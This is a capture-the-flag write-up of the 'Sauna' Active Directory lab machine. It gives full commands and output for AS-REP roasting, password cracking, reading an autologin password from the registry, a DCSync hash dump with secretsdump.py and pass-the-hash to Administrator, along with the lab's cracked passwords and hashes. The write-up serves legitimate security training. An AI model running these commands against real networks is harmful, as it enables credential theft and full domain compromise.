Sauna

TL;DR

  • Create a wordlist of usernames from the information on the website
  • ASRepRoasting. Ask for TGT and break the password with JohnTheRipper
  • Find Autologin’s service account
  • Simulate the behavior of a Domain Controller (DCSync) to retrieve Administrator’s password
  • Pass the hash to get Administrator account

User.txt

Reconnaissance

Let’s start by a Nmap scan:

magnussen@funcMyLife:~/sauna$ nmap -sS -sV -sC -p- -vvv --min-rate 5000 --reason -oN sauna.txt 10.10.10.175
Nmap scan report for sauna.htb (10.10.10.175)
Host is up, received echo-reply ttl 127 (0.21s latency).
Scanned at 2020-03-28 17:20:54 CET for 268s
Not shown: 65520 filtered ports
Reason: 65520 no-responses
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Microsoft DNS
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-03-28 23:25:09Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3269/tcp  open  tcpwrapped    syn-ack ttl 127
49673/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49674/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
56267/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
64432/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 35558/tcp): CLEAN (Timeout)
|   Check 2 (port 64287/tcp): CLEAN (Timeout)
|   Check 3 (port 58329/udp): CLEAN (Timeout)
|   Check 4 (port 57297/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-03-29 00:26:02
|_  start_date: 1601-01-01 00:09:21

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 28 17:25:22 2020 -- 1 IP address (1 host up) scanned in 269.24 seconds

So we find some useful services:

  • DNS (53)
  • IIS (80)
  • Kerberos (88)
  • RPC (135, 593)
  • Samba (138, 445)
  • LDAP (389, 636, 3269)

We also find the domain: EGOTISTICAL-BANK.LOCAL

Let’s start by visiting the website:

Website

The website is pretty empty, but we find an interesting page where the team members are listed.

Team

User enumeration (think like an admin)

We know there is an Active Directory with Kerberos.

One common technique on Kerberos is to search for user that have the property ‘Do not require Kerberos preauthentication’ set.

When the option ‘Do not require Kerberos preauthentication’ is set, the KDC will send a TGT without requiring an authenticator (username/timestamp ciphered by the client session key). It will use the user NTLM hash to cipher the session key. We’ll be able to break it with JohnTheRipper.

Previously we found a probable list of users, but the format is Firstname Lastname which is rarely used as identifier in an Active Directory.

The three most used identifier formats are (they can be separated by a dot or an hyphen):

  • Firstname Lastname (Example: JohnDoe)
  • First Letter of the Firstname Lastname (Example: JDoe)
  • Three First Letters of the Firstname and Three First Letter of the Lastname (Example: JohDoe)

We generate the following wordlist:

fergussmith
fergus.smith
fergus-smith
FERGUSSMITH
FERGUS.SMITH
FERGUS-SMITH
FergusSmith
Fergus.Smith
Fergus-Smith
fsmith
f.smith
f-smith
FSMITH
F.SMITH
F-SMITH
FSmith
F.Smith
F-Smith
fersmi
fer.smi
fer-smi
FERSMI
FER.SMI
FER-SMI
FerSmi
Fer.Smi
Fer-Smi
hugobear
hugo.bear
hugo-bear
HUGOBEAR
HUGO.BEAR
HUGO-BEAR
HugoBear
Hugo.Bear
Hugo-Bear
hbear
h.bear
h-bear
HBEAR
H.BEAR
H-BEAR
HBear
H.Bear
H-Bear
hugbea
hug.bea
hug-bea
HUGBEA
HUG.BEA
HUG-BEA
HugBea
Hug.Bea
Hug-Bea
stevenkerb
steven.kerb
steven-kerb
STEVENKERB
STEVEN.KERB
STEVEN-KERB
StevenKerb
Steven.Kerb
Steven-Kerb
skerb
s.kerb
s-kerb
SKERB
S.KERB
S-KERB
SKerb
S.Kerb
S-Kerb
steker
ste.ker
ste-ker
STEKER
STE.KER
STE-KER
SteKer
Ste.Ker
Ste-Ker
shauncoins
shaun.coins
shaun-coins
SHAUNCOINS
SHAUN.COINS
SHAUN-COINS
ShaunCoins
Shaun.Coins
Shaun-Coins
scoins
s.coins
s-coins
SCOINS
S.COINS
S-COINS
SCoins
S.Coins
S-Coins
shacoi
sha.coi
sha-coi
SHACOI
SHA.COI
SHA-COI
ShaCoi
Sha.Coi
Sha-Coi
bowietaylor
bowie.taylor
bowie-taylor
BOWIETAYLOR
BOWIE.TAYLOR
BOWIE-TAYLOR
BowieTaylor
Bowie.Taylor
Bowie-Taylor
btaylor
b.taylor
b-taylor
BTAYLOR
B.TAYLOR
B-TAYLOR
BTaylor
B.Taylor
B-Taylor
bowtay
bow.tay
bow-tay
BOWTAY
BOW.TAY
BOW-TAY
BowTay
Bow.Tay
Bow-Tay
sophiedriver
sophie.driver
sophie-driver
SOPHIEDRIVER
SOPHIE.DRIVER
SOPHIE-DRIVER
SophieDriver
Sophie.Driver
Sophie-Driver
sdriver
s.driver
s-driver
SDRIVER
S.DRIVER
S-DRIVER
SDriver
S.Driver
S-Driver
sopdri
sop.dri
sop-dri
SOPDRI
SOP.DRI
SOP-DRI
SopDri
Sop.Dri
Sop-Dri

AD pentesting 101: ASRepRoasting and weak password

Let’s hope that one of these accounts exists and has the ‘Do not require Kerberos preauthentication’ property set.

magnussen@funcMyLife:~/sauna$ GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile wordlist.txt -format john -outputfile tgt.txt -dc-ip 10.10.10.175

It seems that the user FSmith fulfill our needs.

$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:89bb00d717574d4672657e868d32e210$47e03c9263f2b670dd43b589926f52e9f4ff7115f6eb8f441326d84f0e66013db989c1b544a75d886dcebec3e86f73d412254d60fba76c0902cb74087aad6fd1ef83caf049e32c2b0d37220329542181a1b87bd2a5f18e3150da42debc463e0bb31586270d48473cddcb3578da18d147adbab0d8a398a85421312234f882bbc48abdf3eaa9c29c9a1cd321a3970e8d2670253c1131bf27c8b433486769220ec1654501f019b875296d63d0d2ebc980c781db408f51142ea8f7062d4eddd18ffe611384e86e15d4ff26a5f45920080d78929159ba4d7bec55a3981d02f0721c6158fb765a6e260d81f431a7029d4e07e4ba7f8a100998d8a4be4bd1b2334dc194

Let’s try to break the TGT with JohnTheRipper:

magnussen@funcMyLife:~/sauna$ john --wordlist=rockyou.txt tgt.txt
$krb5asrep$fsmith@EGOTISTICAL-BANK.LOCAL:Thestrokes23

Let’s try to connect to this account with evilwin-rm:

magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u FSmith -p Thestrokes23 -i 10.10.10.175

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> dir
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
1b5520b98d97cf17f24122a55baf70cf

User access, done!

I AM ROOT

SeChangeNotifyPrivilege & autologin

Let’s check what are the privileges of our user:

*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
egotisticalbank\fsmith S-1-5-21-2966785786-3096785034-1186376766-1105


GROUP INFORMATION
-----------------

Group Name                                  Type             SID          Attributes
=========================================== ================ ============ ==================================================
Everyone                                    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

Nothing really interesting, except the SeChangeNotifyPrivilege that might allow us to perform directory transversal.

Even though we might not have permissions on a directory, we might be able to read files located further in the directory.

Lets see if some accounts have the Autologin feature activated.

Originally, I’ve searched for passwords in the Registry, but the output is too big to put it here, here’s the command anyway: reg query HKLM /f password /t REG_SZ /s

*Evil-WinRM* PS C:\Users\FSmith\Desktop> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
    AutoRestartShell    REG_DWORD    0x1
    Background    REG_SZ    0 0 0
    CachedLogonsCount    REG_SZ    10
    DebugServerCommand    REG_SZ    no
    DefaultDomainName    REG_SZ    EGOTISTICALBANK
    DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager
    DisableBackButton    REG_DWORD    0x1
    EnableSIHostIntegration    REG_DWORD    0x1
    ForceUnlockLogon    REG_DWORD    0x0
    LegalNoticeCaption    REG_SZ
    LegalNoticeText    REG_SZ
    PasswordExpiryWarning    REG_DWORD    0x5
    PowerdownAfterShutdown    REG_SZ    0
    PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
    ReportBootOk    REG_SZ    1
    Shell    REG_SZ    explorer.exe
    ShellCritical    REG_DWORD    0x0
    ShellInfrastructure    REG_SZ    sihost.exe
    SiHostCritical    REG_DWORD    0x0
    SiHostReadyTimeOut    REG_DWORD    0x0
    SiHostRestartCountLimit    REG_DWORD    0x0
    SiHostRestartTimeGap    REG_DWORD    0x0
    Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
    VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
    WinStationsDisabled    REG_SZ    0
    scremoveoption    REG_SZ    0
    DisableCAD    REG_DWORD    0x1
    LastLogOffEndTimePerfCounter    REG_QWORD    0x8e3982368
    ShutdownFlags    REG_DWORD    0x80000027
    DisableLockWorkstation    REG_DWORD    0x0
    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

Pretty simple, we retrieve the account: svc_loanmanager:Moneymakestheworldgoround!

DCSync

Let’s connect to this account and gather data for BloodHound:

magnussen@funcMyLife:~/sauna$ ./evil-winrm.rb -u svc_loanmgr -p Moneymakestheworldgoround! -i 10.10.10.175

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Import-Module .\SharpHound.ps1
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> Invoke-BloodHound -CollectionMethod All -DomainController EGOTISTICAL-BANK.LOCAL -LdapUser svc_loanmgr -LdapPass Moneymakestheworldgoround! -IgnoreLdapCert
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> ls


    Directory: C:\Users\svc_loanmgr\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/2/2020  12:03 PM           9287 20200402120337_BloodHound.zip
-a----         4/2/2020  12:01 PM         972811 SharpHound.ps1

do*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20200402120337_BloodHound.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20200402120337_BloodHound.zip to 20200402120337_BloodHound.zip


Info: Download successful!

We retrieve the following graph in BloodHound.

BloodHound

The user svc_loanmgr has GetChangesAll and GetChanges privileges, with these permissions we’ll be able to perform an DCSync attack on this box.

We’ll use secretsdump.py from Impacket.

DCSync is a command within Mimikatz that an attacker can leverage to simulate the behavior of a Domain Controller. It allows the attacker to pretend to be a Domain Controller and ask other DC’s for user password data. We need the following permissions to perform the attack: Replicating Directory Changes, Replicating Directory Changes All, Replicating Directory Changes In Filtered Set

magnussen@funcMyLife:~/sauna$ secretsdump.py -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:14f2712b1fc067c07340674f336a59a1:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:1fe7419bf3ddce9b30663ab860cbd2411462db6f451a9b08fee43b43d264715f
SAUNA$:aes128-cts-hmac-sha1-96:445f4b4c51415ca8dbfeca3a8c945a23
SAUNA$:des-cbc-md5:c19d13852ce3df9e
[*] Cleaning up...

Let’s do some pass the hash, we won’t even have to crack the password to connect as Administrator!

magnussen@funcMyLife:~/sauna$ wmiexec.py -hashes :d9485863c1e9e05851aa40cbb4ab9dff Administrator@10.10.10.175
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\Users\Administrator\Desktop

01/23/2020  04:11 PM    <DIR>          .
01/23/2020  04:11 PM    <DIR>          ..
01/23/2020  11:22 AM                32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   7,139,856,384 bytes free
C:\Users\Administrator\Desktop>type root.txt
f3ee04965c68257382e31502cc5e881f

This was my first Windows machine, I’ve learned a lot of things on Kerberos and Active Directory environment. I still have a lot to learn about Windows and Active Directory attacks, but it was a really great introduction!

Thanks Egotisticalsw for the box!